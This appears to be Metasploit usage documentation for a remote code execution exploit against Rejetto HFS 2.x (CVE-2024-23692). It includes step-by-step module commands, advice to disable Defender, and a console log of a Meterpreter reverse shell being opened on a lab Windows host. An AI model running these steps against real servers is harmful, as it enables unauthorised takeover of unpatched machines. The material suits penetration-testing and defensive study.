## Vulnerable Application
The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to a unauthenticated server side template
injection (SSTI) vulnerability. An remote unauthenticated attacker can execute code with the privileges
of the user account running the HFS.exe server process. This exploit has been tested to work against version
2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers
and no patch is available. Users are recommended to upgrade to version 3.x.

## Testing
[Download](https://github.com/rejetto/hfs2/releases/download/v2.4-rc06/hfs.exe) a vulnerable version of HTTP
File Server (HFS). To run this server, simply execute the HFS.exe binary. By default the server will listen for
HTTP connections on port 80.

The exploit has been tested against versions:
* 2.4.0 RC7
* 2.3m

## Verification Steps
Note: On Windows, disable Defender if you are using the default payloads.

1. Start msfconsole
2. `use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set payload cmd/windows/http/x64/meterpreter_reverse_http`
5. `set LHOST eth0`
6. `set LPORT 4444`
7. `check`
8. `exploit`

## Scenarios

### Automatic

```
msf > use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RHOSTS 192.168.86.35
RHOSTS => 192.168.86.35
msf exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set payload cmd/windows/http/x64/meterpreter_reverse_http
payload => cmd/windows/http/x64/meterpreter_reverse_http
msf exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LHOST eth0
LHOST => eth0
msf exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LPORT 4444
LPORT => 4444
msf exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > show options

Module options (exploit/windows/http/rejetto_hfs_rce_cve_2024_23692):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.86.35    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                   yes       The base path to the web application
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter_reverse_http):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                           no        Comma-separate list of extensions to load
   EXTINIT                              no        Initialization strings for extensions
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      gnwWBKQz         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               eth0             yes       The local listener hostname
   LPORT               4444             yes       The local listener port
   LURI                                 no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
[+] 192.168.86.35:80 - The target is vulnerable. Rejetto HFS version 2.4.0 RC7
msf exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > exploit 

[*] Started HTTP reverse handler on http://192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Rejetto HFS version 2.4.0 RC7
[!] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Redirecting stageless connection from /pBzS1uPGeqRa91v1PJaNDwwtxXK-KTpGms8g with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'
[!] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Attaching orphaned/stageless session...
[!] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.35:31348) at 2024-06-06 16:38:33 +0100

meterpreter > getuid
Server username: testing-vm\user
meterpreter > sysinfo
Computer        : TESTING-VM
OS              : Windows 11 (10.0 Build 22631).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```
